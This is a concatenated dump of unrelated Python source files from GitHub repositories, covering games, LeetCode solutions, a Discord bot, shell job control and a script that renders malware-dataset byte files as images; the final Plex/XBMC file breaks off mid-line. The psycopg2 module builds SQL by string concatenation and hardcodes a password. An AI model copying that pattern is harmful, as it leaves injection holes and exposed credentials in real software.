{"seq_id":"36785995184","text":"import pygame, math\r\n\r\n\r\ndef borderOutside(surface, color, weight, x, y, w, h):\r\n    pygame.draw.rect( surface, color, [(x-weight, y-weight), (w+weight, weight)])\r\n    pygame.draw.rect( surface, color, [(x+w, y-weight), (weight, h+weight)])\r\n    pygame.draw.rect( surface, color, [(x, y+h), (w+weight, weight)])\r\n    pygame.draw.rect( surface, color, [(x-weight, y), (weight, h+weight)])\r\n\r\n\r\ndef pillOutside(surface, color, weight, x, y, w, h):\r\n    ax = x-weight\r\n    ay = y-weight\r\n    r = h+2*weight\r\n    lx = ax+(h+1)/2-weight\r\n    lw = w+2*weight-h\r\n    l2y = y+h+1-weight\r\n    a2x = ax+lw-2*weight\r\n\r\n    pygame.draw.rect( surface, color, [(lx, ay), (lw, weight)])\r\n    pygame.draw.rect( surface, color, [(x+w, y-weight), (weight, h+weight)])\r\n    pygame.draw.rect( surface, color, [(lx, l2y), (lw, weight)])\r\n    pygame.draw.rect( surface, color, [(x-weight, y), (weight, h+weight)])\r\n    pygame.draw.arc(surface, color, [(ax,ay),(r,r)], 0.5*math.pi, 1.5*math.pi, weight)\r\n    pygame.draw.arc(surface, color, [(a2x,ay),(r,r)], 1.5*math.pi, 0.5*math.pi, weight)\r\n\r\n\r\ndef borderOutsideOfRect(surface, color, weight, rect):\r\n    borderOutside(surface, color, weight, rect.left, rect.top, rect.width, rect.height)\r\n\r\n\r\ndef textSurface( text, font, color, loc, surf, justify = \"center\", upsideDown=False):\r\n    t = font.render( text, True, color )\r\n    tr = t.get_rect()\r\n    if upsideDown:\r\n        t = pygame.transform.flip(t, False, True)\r\n\r\n    setattr( tr, justify, loc )\r\n    surf.blit( t, tr )\r\n    return tr\r\n\r\n\r\ndef textSurfaceBox( self ):\r\n    return pygame.draw.rect(\r\n        self.worldsurf, self.message_box_color, 
self.gamesurf_msg_rect, 0 )\n\n\ndef textInput(world, txt, x, y, w, h,\n focused=False, withTicks=True,\n clr1=(120,200,50), clr2 = (120,200,40)):\n\n srfc = world.worldsurf\n borderOutside(srfc, clr1, 2, x, y, w, h)\n\n if focused:\n pygame.draw.rect( srfc, clr1, [(x, y), (w, h)]) # button fill\n textSurface(txt, world.scores_font, (255,255,255), (x + w // 2, y + h // 2), srfc, \"center\")\n\n\ndef button(world, txt, x, y, w, h,\n focused=False, withTicks=True,\n clr1=(120,200,50), clr2 = (120,200,40)):\n\n srfc = world.worldsurf\n borderOutside(srfc, clr1, 2, x, y, w, h)\n\n if focused:\n pygame.draw.rect( srfc, clr1, [(x, y), (w, h)]) # button fill\n\n clr2 = world.bg_color # text and arrow color\n\n # arrows\n tx, ty, t2x = x-2, y+(h-20)/2, x+w+2\n if withTicks:\n pygame.draw.polygon(srfc, clr2, [(tx, ty), (tx+14, ty+10), (tx,ty+20)])\n pygame.draw.polygon(srfc, clr2, [(t2x, ty), (t2x-14, ty+10), (t2x,ty+20)])\n\n textSurface(txt, world.scores_font, clr2, (x+w//2, y+h//2), srfc, \"center\")\n\n\ndef verticalTab(world, txt, x, y, w, h, focused=False,\n clrFocused = (120,200,50),\n clrBlurred = (60,140,10),\n clrFocusedText = None,\n clrBlurredText = (60,140,10)\n):\n\n if clrFocusedText == None:\n clrFocusedText = world.bg_color\n if clrBlurredText == None:\n clrBlurredText = clrBlurred\n\n srfc = world.worldsurf\n marginBottom = 1\n if focused:\n h += 4\n w += 10\n y -= 2\n x -= 6\n marginBottom = -3\n pygame.draw.rect( srfc, clrFocused, [(x, y), (w, h)]) # button fill\n\n clrTxt = clrFocusedText # text and arrow color\n\n # arrows\n ty = y+(h-20)/2\n pygame.draw.polygon(srfc, clrBlurred,\n [(x-2, ty), (x+14, ty+10), (x-2,ty+20)])\n\n else:\n # pygame.draw.rect( srfc, clr1, [(x, y), (w, 2)])\n # pygame.draw.rect( srfc, clrBlurred, [(x+w, y), (1, h)])\n pygame.draw.rect( srfc, clrBlurred, [(x, y+h), (w+1, 1)])\n clrTxt = clrBlurredText\n\n textSurface(txt, world.scores_font, clrTxt, (x+w//2, y+h//2), srfc, \"center\")\n\n return y+h+marginBottom\n\n\ndef simpleText(world, text, x=-1, y=-1, color=(120,200,50), srf=None, alignment=\"center\"):\n if srf == None:\n srf = world.worldsurf\n\n return textSurface(text, world.scores_font, color, (x, y), srf, alignment)\n\n\ndef infoText(world, text, x=-1, y=-1, color=(120,200,50), srf = None):\n if x == -1 or y == -1:\n rect = world.worldsurf_rect\n if x == -1:\n x = int(rect.width/4)*3 + 15\n if y == -1:\n y = int(rect.height/2)\n\n return simpleText(world, text, x, y, color, srf, \"center\")\n\n\ndef square( self, surface, left, top, color_id , alpha = 255, gray = False):\n lvl = self.level % len( self.NES_colors )\n if self.color_mode == \"REMIX\":\n block = self.blocks[lvl][self.block_color_type[color_id - 1]]\n else:\n block = self.blocks[lvl][color_id] if not gray else self.gray_block\n\n block.set_alpha(alpha)\n surface.blit( block, ( left, top ) )\n\n\ndef blocks( self, obj, surf, rect, x = 0, y = 0, resetX = False, alpha = 255, gray = False):\n ix = x\n iy = y\n for i in obj:\n for j in i:\n if j != 0:\n square(self, surf, ix, iy, color_id = j, alpha = alpha, gray = gray )\n ix += self.side\n if resetX:\n ix = 0\n else:\n ix = x\n iy += self.side\n\n if self.inverted:\n self.worldsurf.blit( pygame.transform.flip(surf, False, True), rect)\n else:\n self.worldsurf.blit( surf, rect )\n\n\n#draw the underlying game board the current zoid interacts with\ndef board( self, alpha = 255):\n echo = (\n (self.board_echo_placed and self.are_counter > 0) or\n (self.board_echo_lc and self.lc_counter > 0)\n )\n\n if self.visible_board or echo:\n\n if 
not self.board_mask or not self.mask_toggle:\n if self.dimtris and not echo:\n alpha = self.dimtris_alphas[min(self.level, len(self.dimtris_alphas)-1)]\n\n blocks(\n self, self.board, self.gamesurf, self.gamesurf_rect,\n resetX = True, alpha = alpha, gray = self.gray_board\n )\n\n else:\n self.gamesurf.fill( self.mask_color )\n self.worldsurf.blit( self.gamesurf , self.gamesurf_rect)\n","repo_name":"jack13berry/metatris","sub_path":"py-metatris/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26128371292","text":"from Board import Board\nfrom pathlib import Path\nfrom abc import ABC, abstractmethod\n\nclass SearchAlgo(ABC):\n def __init__(self, board: Board, max_depth: int, index: int):\n self.board = board\n self.max_depth = max_depth\n\n # File creation\n Path(\"Outputs\").mkdir(parents=True, exist_ok=True)\n\n algo_name = type(self).__name__.lower()\n\n # Search file\n file_name_dfs_search = \"Outputs/\" + str(index) + \"_\" + algo_name + \"_search.txt\"\n self.search_file = open(file_name_dfs_search, \"w+\")\n\n # Solution file\n file_name_dfs_solution = \"Outputs/\" + str(index) + \"_\" + algo_name + \"_solution.txt\"\n self.solution_file = open(file_name_dfs_solution, \"w+\")\n\n def populate_solution_file(self, board: Board):\n solution_list = []\n key_value_pair = {board.getPosition(board.touch_idx): board.puzzle_config}\n solution_list.append(key_value_pair)\n\n while not board.isRoot():\n board = board.parent\n key_value_pair = {board.getPosition(board.touch_idx): board.puzzle_config}\n solution_list.append(key_value_pair)\n\n solution_list.reverse()\n\n first_flag = True\n for pair in solution_list:\n position = list(pair.keys())[0]\n config = list(pair.values())[0]\n\n if first_flag:\n self.solution_file.write(\"0 \" + config + \"\\n\")\n first_flag = False\n else:\n self.solution_file.write(str(position) + \" \" + config + \"\\n\")\n\n self.solution_file.close()\n\n @abstractmethod\n def search(self):\n pass\n\n @abstractmethod\n def update_and_sort_open_list(self, b:Board, open_list):\n pass\n\n def getSearchOutput(self, g, h, board):\n return \"{}\\t{}\\t{}\\t{}\".format(int(g+h), g, h, board)\n","repo_name":"tarekait1996/IndonesianDotPuzzle","sub_path":"SearchAlgo.py","file_name":"SearchAlgo.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73030671733","text":"\"\"\"\nJob control for the xonsh shell.\n\"\"\"\nimport os\nimport sys\nimport time\nimport signal\nimport builtins\nfrom subprocess import TimeoutExpired\n\nfrom xonsh.tools import ON_WINDOWS\n\ntry:\n _shell_tty = sys.stderr.fileno()\nexcept OSError:\n _shell_tty = None\n\n\nif ON_WINDOWS:\n def _continue(obj):\n return None\n\n\n def _kill(obj):\n return obj.kill()\n\n\n def ignore_sigtstp():\n pass\n\n\n def _set_pgrp(info):\n pass\n\n def wait_for_active_job(signal_to_send=None):\n \"\"\"\n Wait for the active job to finish, to be killed by SIGINT, or to be\n suspended by ctrl-z.\n \"\"\"\n _clear_dead_jobs()\n act = builtins.__xonsh_active_job__\n if act is None:\n return\n job = builtins.__xonsh_all_jobs__[act]\n obj = job['obj']\n if job['bg']:\n return\n while obj.returncode is None:\n try:\n obj.wait(0.01)\n except TimeoutExpired:\n pass\n except KeyboardInterrupt:\n obj.kill()\n if obj.poll() is not None:\n builtins.__xonsh_active_job__ = None\n\nelse:\n def 
_continue(obj):\n return signal.SIGCONT\n\n\n def _kill(obj):\n os.kill(obj.pid, signal.SIGKILL)\n\n\n def ignore_sigtstp():\n signal.signal(signal.SIGTSTP, signal.SIG_IGN)\n\n\n def _set_pgrp(info):\n try:\n info['pgrp'] = os.getpgid(info['obj'].pid)\n except ProcessLookupError:\n pass\n\n\n _shell_pgrp = os.getpgrp()\n\n _block_when_giving = (signal.SIGTTOU, signal.SIGTTIN, signal.SIGTSTP)\n\n\n def _give_terminal_to(pgid):\n # over-simplified version of:\n # give_terminal_to from bash 4.3 source, jobs.c, line 4030\n # this will give the terminal to the process group pgid\n if _shell_tty is not None and os.isatty(_shell_tty):\n oldmask = signal.pthread_sigmask(signal.SIG_BLOCK, _block_when_giving)\n os.tcsetpgrp(_shell_tty, pgid)\n signal.pthread_sigmask(signal.SIG_SETMASK, oldmask)\n\n\n def wait_for_active_job(signal_to_send=None):\n \"\"\"\n Wait for the active job to finish, to be killed by SIGINT, or to be\n suspended by ctrl-z.\n \"\"\"\n _clear_dead_jobs()\n act = builtins.__xonsh_active_job__\n if act is None:\n return\n job = builtins.__xonsh_all_jobs__[act]\n obj = job['obj']\n if job['bg']:\n return\n pgrp = job['pgrp']\n obj.done = False\n\n # give the terminal over to the fg process\n _give_terminal_to(pgrp)\n # if necessary, send the specified signal to this process\n # (this hook was added because vim, emacs, etc, seem to need to have\n # the terminal when they receive SIGCONT from the \"fg\" command)\n if signal_to_send is not None:\n os.kill(obj.pid, signal_to_send)\n _, s = os.waitpid(obj.pid, os.WUNTRACED)\n if os.WIFSTOPPED(s):\n obj.done = True\n job['bg'] = True\n job['status'] = 'stopped'\n print() # get a newline because ^Z will have been printed\n print_one_job(act)\n elif os.WIFSIGNALED(s):\n print() # get a newline because ^C will have been printed\n if obj.poll() is not None:\n builtins.__xonsh_active_job__ = None\n _give_terminal_to(_shell_pgrp) # give terminal back to the shell\n\n\ndef _clear_dead_jobs():\n to_remove = set()\n for num, job in builtins.__xonsh_all_jobs__.items():\n obj = job['obj']\n if obj.poll() is not None:\n to_remove.add(num)\n for i in to_remove:\n del builtins.__xonsh_all_jobs__[i]\n if builtins.__xonsh_active_job__ == i:\n builtins.__xonsh_active_job__ = None\n if builtins.__xonsh_active_job__ is None:\n _reactivate_job()\n\n\ndef _reactivate_job():\n if len(builtins.__xonsh_all_jobs__) == 0:\n return\n builtins.__xonsh_active_job__ = max(builtins.__xonsh_all_jobs__.items(),\n key=lambda x: x[1]['started'])[0]\n\n\n\ndef print_one_job(num):\n \"\"\"Print a line describing job number ``num``.\"\"\"\n try:\n job = builtins.__xonsh_all_jobs__[num]\n except KeyError:\n return\n act = '*' if num == builtins.__xonsh_active_job__ else ' '\n status = job['status']\n cmd = [' '.join(i) if isinstance(i, list) else i for i in job['cmds']]\n cmd = ' '.join(cmd)\n pid = job['pids'][-1]\n bg = ' &' if job['bg'] else ''\n print('{}[{}] {}: {}{} ({})'.format(act, num, status, cmd, bg, pid))\n\n\ndef get_next_job_number():\n \"\"\"Get the lowest available unique job number (for the next job created).\n \"\"\"\n _clear_dead_jobs()\n i = 1\n while i in builtins.__xonsh_all_jobs__:\n i += 1\n return i\n\n\ndef add_job(info):\n \"\"\"\n Add a new job to the jobs dictionary.\n \"\"\"\n info['started'] = time.time()\n info['status'] = 'running'\n _set_pgrp(info)\n num = get_next_job_number()\n builtins.__xonsh_all_jobs__[num] = info\n builtins.__xonsh_active_job__ = num\n if info['bg']:\n print_one_job(num)\n\n\ndef _default_sigint_handler(num, frame):\n 
raise KeyboardInterrupt\r\n\r\n\r\ndef kill_all_jobs():\r\n    \"\"\"\r\n    Send SIGKILL to all child processes (called when exiting xonsh).\r\n    \"\"\"\r\n    _clear_dead_jobs()\r\n    for job in builtins.__xonsh_all_jobs__.values():\r\n        _kill(job['obj'])\r\n\r\n\r\ndef jobs(args, stdin=None):\r\n    \"\"\"\r\n    xonsh command: jobs\r\n\r\n    Display a list of all current jobs.\r\n    \"\"\"\r\n    _clear_dead_jobs()\r\n    for j in sorted(builtins.__xonsh_all_jobs__):\r\n        print_one_job(j)\r\n    return None, None\r\n\r\n\r\ndef fg(args, stdin=None):\r\n    \"\"\"\r\n    xonsh command: fg\r\n\r\n    Bring the currently active job to the foreground, or, if a single number is\r\n    given as an argument, bring that job to the foreground.\r\n    \"\"\"\r\n    _clear_dead_jobs()\r\n    if len(args) == 0:\r\n        # start active job in foreground\r\n        act = builtins.__xonsh_active_job__\r\n        if act is None:\r\n            return '', 'Cannot bring nonexistent job to foreground.\\n'\r\n    elif len(args) == 1:\r\n        try:\r\n            act = int(args[0])\r\n        except ValueError:\r\n            return '', 'Invalid job: {}\\n'.format(args[0])\r\n        if act not in builtins.__xonsh_all_jobs__:\r\n            return '', 'Invalid job: {}\\n'.format(args[0])\r\n    else:\r\n        return '', 'fg expects 0 or 1 arguments, not {}\\n'.format(len(args))\r\n    builtins.__xonsh_active_job__ = act\r\n    job = builtins.__xonsh_all_jobs__[act]\r\n    job['bg'] = False\r\n    job['status'] = 'running'\r\n    print_one_job(act)\r\n    wait_for_active_job(_continue(job['obj']))\r\n\r\n\r\ndef bg(args, stdin=None):\r\n    \"\"\"\r\n    xonsh command: bg\r\n\r\n    Resume execution of the currently active job in the background, or, if a\r\n    single number is given as an argument, resume that job in the background.\r\n    \"\"\"\r\n    _clear_dead_jobs()\r\n    if len(args) == 0:\r\n        # start active job in foreground\r\n        act = builtins.__xonsh_active_job__\r\n        if act is None:\r\n            return '', 'Cannot send nonexistent job to background.\\n'\r\n    elif len(args) == 1:\r\n        try:\r\n            act = int(args[0])\r\n        except ValueError:\r\n            return '', 'Invalid job: {}\\n'.format(args[0])\r\n        if act not in builtins.__xonsh_all_jobs__:\r\n            return '', 'Invalid job: {}\\n'.format(args[0])\r\n    else:\r\n        return '', 'bg expects 0 or 1 arguments, not {}\\n'.format(len(args))\r\n    builtins.__xonsh_active_job__ = act\r\n    job = builtins.__xonsh_all_jobs__[act]\r\n    job['bg'] = True\r\n    job['status'] = 'running'\r\n    print_one_job(act)\r\n    wait_for_active_job(_continue(job['obj']))\r\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/donnemartin_gitsome/gitsome-master/xonsh/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} {"seq_id":"70751729972","text":"class Solution:\n    def findRedundantConnection(self, edges: List[List[int]]) -> List[int]:\n        # union find\n        # if two nodes have the same parent, they are already connected and the connection is redundant\n        \n        parent = [i for i in range(len(edges))]\n        degree = [1]*len(edges)\n        res=[]\n        \n        def find(p):\n            while p!=parent[p]:\n                p=parent[p]\n            return p\n        \n        def union(n1,n2):\n            p1,p2=find(n1),find(n2)\n            if p1==p2:\n                return 1\n            elif degree[p1]>degree[p2]:\n                degree[p1]+=degree[p2]\n                parent[p2]=p1\n            else:\n                degree[p2]+=degree[p1]\n                parent[p1]=p2\n            return 0\n        for n1, n2 in edges:\n            if union(n1-1,n2-1):\n                res=[n1,n2]\n        return res","repo_name":"HaojunYuan/MyLeetCode","sub_path":"0684-redundant-connection/0684-redundant-connection.py","file_name":"0684-redundant-connection.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"18205624492","text":"class Solution:\n    def largestDivisibleSubset(self, 
List[int]) -> List[int]:\n        n = len(nums)\n        ans = []\n        count = [1] * n\n        prevIndex = [-1] * n\n        maxCount = 0\n        index = -1\n\n        nums.sort()\n\n        for i, num in enumerate(nums):\n            for j in reversed(range(i)):\n                if num % nums[j] == 0 and count[i] < count[j] + 1:\n                    count[i] = count[j] + 1\n                    prevIndex[i] = j\n            if count[i] > maxCount:\n                maxCount = count[i]\n                index = i\n\n        while index != -1:\n            ans.append(nums[index])\n            index = prevIndex[index]\n\n        return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0368. Largest Divisible Subset/0368.py","file_name":"0368.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} {"seq_id":"21042380045","text":"import discord\r\nimport discord.message\r\nfrom discord.ext import commands\r\nfrom discord import app_commands\r\nfrom SearchTools import *\r\nfrom ExtractTools import *\r\nfrom EctTools import *\r\n\r\n\r\nclass TroubleFinder(commands.Cog):\r\n    def __init__(self, bot):\r\n        self.bot = bot\r\n    \r\n    @app_commands.command(name='사사게', description='인벤 사사게 수록 정보를 알려줍니다.')\r\n    @app_commands.describe(char_name = '닉네임')\r\n    async def trouble_info(self, interaction: discord.Interaction, char_name: str):\r\n        \"\"\"\r\n        char_name : character name\r\n        \r\n        return:\r\n            titles and hyperlinks of incident-board posts found among the most recent 10,000 posts \r\n        \"\"\"\r\n        \r\n        print(interaction.command.name, toNowTime())\r\n        \r\n        trouble_search = TroubleSearch(char_name)\r\n        trouble_post, trouble_title = trouble_search.searchTrouble()\r\n        \r\n        embed = discord.Embed(title=f':exclamation: 사사게 검색 결과 - {char_name}', \r\n                              description='''부캐명이 포함되지 않을 수 있다는 점 참고 부탁드립니다!\r\n                              최근 1만개의 게시글 내에서 검색합니다.''')\r\n\r\n        if len(trouble_post) == 0 and len(trouble_title) == 0:\r\n            embed.add_field(name='', value='**검색 결과가 없습니다!**')\r\n            await interaction.response.send_message(embed=embed)\r\n            return\r\n        \r\n        # output each search result together with its index\r\n        for idx, (url, title) in enumerate(zip(trouble_post, trouble_title)):\r\n            idx += 1\r\n            embed.add_field(name='', value=f'{idx}. 
[{title}](<{url}>)', inline=False)\n \n await interaction.response.send_message(embed=embed)\n \nasync def setup(bot: commands.Bot):\n await bot.add_cog(\n TroubleFinder(bot)\n )","repo_name":"KimChanw/LoVis_LostarkDiscordBot","sub_path":"Cogs/TroubleFinder.py","file_name":"TroubleFinder.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"45492104775","text":"from dotenv import load_dotenv\n\nload_dotenv()\n\nfrom os import getenv\n\n\ndef smart_bool(val: str) -> bool:\n if val.strip().lower() in [\"true\", \"yes\", \"1\"]:\n return True\n if val.strip().lower() in [\"false\", \"no\", \"0\", \"\"]:\n return False\n raise ValueError(f\"Config value of {val} could not be coerced into bool\")\n\n\nclass BaseConfig:\n def __init__(self):\n for env_variable, value_class in self.__class__.__dict__[\n \"__annotations__\"\n ].items():\n env_value = getenv(env_variable.upper())\n if env_value:\n parsed_value = value_class(env_value)\n else:\n parsed_value = getattr(self, env_variable)\n setattr(self, env_variable, parsed_value)\n\n\ndef write_env(config):\n with open(\".env\", \"w\") as f:\n for env_var in config.__class__.__dict__[\"__annotations__\"]:\n val = getattr(config, env_var)\n f.write(f\"{env_var.upper()}={val}\\n\")\n","repo_name":"voglster/sparkles","sub_path":"sparkles/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"2712009975","text":"from transformers import BertConfig\n\n\nclass KebioConfig(BertConfig):\n \"\"\"Configuration for `KebioModel`.\"\"\"\n\n def __init__(self,\n vocab_size,\n num_entities,\n max_mentions=15,\n max_candidate_entities=100,\n hidden_size=768,\n entity_size=50,\n num_hidden_layers=12,\n num_context_layers=8,\n num_attention_heads=12,\n intermediate_size=3072,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=16,\n initializer_range=0.02, **kwargs):\n super(KebioConfig, self).__init__(vocab_size=vocab_size,\n hidden_size=hidden_size,\n num_hidden_layers=num_hidden_layers,\n num_attention_heads=num_attention_heads,\n intermediate_size=intermediate_size,\n hidden_act=hidden_act,\n hidden_dropout_prob=hidden_dropout_prob,\n attention_probs_dropout_prob=attention_probs_dropout_prob,\n max_position_embeddings=max_position_embeddings,\n type_vocab_size=type_vocab_size,\n initializer_range=initializer_range, **kwargs)\n self.num_context_layers = num_context_layers\n self.entity_size = entity_size\n self.num_entities = num_entities\n self.max_mentions = max_mentions\n self.max_candidate_entities = max_candidate_entities\n","repo_name":"GanjinZero/KeBioLM","sub_path":"configuration_kebio.py","file_name":"configuration_kebio.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"21"} +{"seq_id":"41609498741","text":"import psycopg2\n\n\ndef connect_to_db():\n try:\n connection = psycopg2.connect(user=\"postgres\",\n password=\"testingPassword\",\n host=\"127.0.0.1\",\n port=\"5432\",\n database=\"camaradb\")\n return connection\n except (Exception, psycopg2.Error) as error:\n print(\"Error while connecting to PostgreSQL\", error)\n\n\nconn = connect_to_db()\n\n\ndef insert_remuneracao(remuneracao, conn):\n cursor = conn.cursor()\n cursor.execute('INSERT INTO 
remuneracoes (vereador, total_vantagens, descontos_totais, valor_liquido, data) VALUES (' + \"'\" + remuneracao.vereador + \"', \" + remuneracao.total_vantagens + ', ' +\r\n                   remuneracao.descontos_totais + ', ' + remuneracao.valor_liquido + \", '\" + remuneracao.data + \"');\")\r\n    conn.commit()\r\n\r\n\r\ndef insert_to_db(insert_string):\r\n    cursor = conn.cursor()\r\n    cursor.execute(insert_string)\r\n    conn.commit()\r\n\r\n\r\ndef select_from_db(select_query):\r\n    cursor = conn.cursor()\r\n    cursor.execute(select_query)\r\n    data = cursor.fetchall()\r\n    cursor.close()\r\n    return data\r\n\r\n\r\ndef update_to_db(update_query):\r\n    cursor = conn.cursor()\r\n    cursor.execute(update_query)\r\n    conn.commit()\r\n    cursor.close()\r\n","repo_name":"caio-tenorio/csv_extractor","sub_path":"database/database_connection.py","file_name":"database_connection.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"9453249503","text":"class Question:\n    def __init__(self, prompt, answer):\n        self.prompt = prompt\n        self.answer = answer\n\n\nquestion_prompts = [\n    \"What color are apples?\\n(a) red/green\\n(b) purple/pink\\n(c) orange\\n\",\n    \"Where do kids come from?\\n(a) Santa\\n(b) Stork\\n(c) The Domino's delivery guy\\n\",\n    \"What time is midnight?\\n(a) 1am\\n(b) 12pm\\n(c) 12am\\n\"\n    ]\n\nquestions = [\n    Question(question_prompts[0], \"a\"),\n    Question(question_prompts[1], \"b\"),\n    Question(question_prompts[2], \"c\")\n    ]\n\ndef run_test(questions):\n    points = 0\n    for question in questions:\n        answer = input(question.prompt)\n        if answer == question.answer:\n            points += 1\n\n    return points","repo_name":"PapaGotBeef/3pythonclasses","sub_path":"pythonProject2/Quiz.py","file_name":"Quiz.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"20427096437","text":"# Write a program that reads a car's speed. If it exceeds 80 km/h, show a message saying the driver has been fined. The fine costs 7.00 for each km over the limit.\r\n\r\nprint('\\nVerificador de Velocidade.')\r\nvelocidade = input('\\nInforme a velocidade: ').strip()\r\nwhile velocidade.isnumeric() == False or int(velocidade) == 0:\r\n    velocidade = input(\r\n        '\\nSó é permitido Numeros/Não permitido zero\\nInforme a velocidade: ').strip()\r\nvelocidade = float(velocidade)\r\nif velocidade > 80:\r\n    print('\\nVelocidade Acima do permitido.\\nVocê foi MULTADO por exceder {:.0f} Km/h\\nValor da Multa: R$ {:.2f}'.format(\r\n        (velocidade - 80), (velocidade - 80) * 7))\r\nelse:\r\n    print('Parabéns. 
Você está dentro da velocidade permitida para esta via.')\r\n","repo_name":"Rodjfreitas/learning-python","sub_path":"Exercicios/ex0029.py","file_name":"ex0029.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} {"seq_id":"11081208006","text":"# This problem is really about big numbers, so simply putting every value into a list misses the point.\n# I solve it using the big-number approach (building digit strings recursively).\n\nclass Solution:\n    def printNumbers(self, n: int) -> List[int]:\n        self.result = []\n        if n<=0:\n            return []\n        s = ['0' for i in range(n)]\n        self.helper(s,0,n)\n        return self.result[1:]\n\n    def helper(self,s,index,n):\n        if index==n:\n            self.result.append(int(''.join(s)))\n            return \n        for i in range(10):\n            s[index] = str(i)\n            self.helper(s,index+1,n)","repo_name":"SummerRaining/offer_code_practice","sub_path":"17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"29418270792","text":"import numpy as np\r\nfrom PIL import Image\r\nimport sys\r\nimport glob\r\nimport errno\r\nimport os \r\nresult=[]\r\ntemp1=np.zeros((256,256))\r\nimage = np.zeros((256,256))\r\ni,j,p=0,0,0\r\npath = \"C:/Users/admin/Project IAS/Module1/data1/\" ## Absolute path for the database.\r\ndirs = os.listdir( path ) ## gets all the directories in the given folder.\r\npath2 = \"C:/Users/admin/Project IAS/Module1/image256/\" ## Absolute path for storing 256x256 image.\r\npath3 = \"C:/Users/admin/Project IAS/Module1/image36/\" ## Absolute path for storing 36x36 image.\r\nfor fil in dirs:\r\n    image = np.zeros((256,256))\r\n    with open(path+fil, \"rb\") as f: ## read byte mode\r\n        byte = f.read(1) ## reading 1 byte at a time. returns a byte object.\r\n        i,j,p=0,0,0\r\n        print(fil)\r\n        #print (byte)\r\n        while byte != b\"\": ## iterating till the end of the file\r\n            # print (ord(byte),byte) ## ord gives ASCII value of that char.\r\n            if(i<256):\r\n                if(byte.decode(\"utf-8\")==' ' or byte.decode(\"utf-8\")=='\\r' or byte.decode(\"utf-8\")=='\\n' or byte.decode(\"utf-8\")=='?' ):\r\n                    byte = f.read(1)\r\n                    continue\r\n                # image[i][p]=0\r\n                #print (byte.decode(\"utf-8\"),int(byte.decode(\"utf-8\"),16),i)\r\n                if(j>8):\r\n                    image[i][p]= int(byte.decode(\"utf-8\"),16) ## byte.decode gives the value of the byte object which is converted into hexa-decimal.\r\n                    p=p+1\r\n                j=j+1\r\n                if(p>255):\r\n                    p=0\r\n                    j=0\r\n                    i=i+1\r\n            byte = f.read(1)\r\n        a=np.matrix(image)\r\n        # a=np.matrix(image)\r\n        print (a)\r\n        result.append(np.array_equal(temp1,a))\r\n        temp1=a\r\n        img = Image.fromarray(image, 'L') ## makes 2D array into an image. 
L-> The kind of pixel (8-bit pixel black and white)\n #img.show()\n img.save(path2+fil[0:-6]+\".bmp\")\n img = img.resize((36,36),Image.ANTIALIAS)\n img.save(path3+fil[0:-6]+\".bmp\")\n #img.show()\nprint (result)\n\n\n\n# with open('C:/Users/admin/Project IAS/data/sample/0fHVZKeTE6iRb1PIQ4au.bytes', 'r') as file1:\n# print(file1.read())\n# import pandas as pd\n# df = pd.read_csv(\"C:/Users/admin/Project IAS/data/sample/0fHVZKeTE6iRb1PIQ4au.bytes\")\n# print(df.drop([0]))\n# with open('C:/Users/admin/Project IAS/data/sample/0gDsIvrylX5fPbG7cSBn.bytes', 'r') as file2:\n# print(file2.read())\n'''\n#same.discard('\\n')\n\n# with open('some_output_file.txt', 'w') as file_out:\n# for line in same:\n# file_out.write(line)\n\nwith open(\"apt1/APT1/VirusShare_00dbb9e1c09dbdafb360f3163ba5a3de.json\", \"rb\") as f:\n byte = f.read(1)\n while byte:\n #print ord(byte)\n if(i<256):\n image[i][j]=ord(byte)\n j=j+1\n if(j>255):\n j=0\n i=i+1\n byte = f.read(1)\n\nprint(np.matrix(image))\nimg = Image.fromarray(image, 'L')\nimg.show()\nimg = img.resize((36,36),Image.ANTIALIAS)\nimg.show()\n\n'''\n","repo_name":"riak16/Malware-Detection-using-Deep-Learning","sub_path":"ias_full.py","file_name":"ias_full.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"21"} +{"seq_id":"39866644968","text":"import plexmyxbmc\nfrom plexmyxbmc import millis_to_time\nfrom plexmyxbmc.xbmc_rpc import InvalidRPCConnection\nimport plexapi.video as video\nfrom plexmyxbmc.log import get_logger\n\n\nclass PlayerType(object):\n def __init__(self, type):\n self._type = type\n\n @property\n def plex(self):\n if 'audio' == self._type:\n return 'music'\n return self._type\n\n @property\n def xbmc(self):\n if 'music' == self._type:\n return 'audio'\n return self._type\n\n def __eq__(self, other):\n if not isinstance(other, PlayerType):\n return False\n return self.plex == other.plex\n\n\nclass XBMC(object):\n def __init__(self, rpc):\n self._logger = get_logger(self.__class__.__name__)\n self._rpc = rpc\n if not 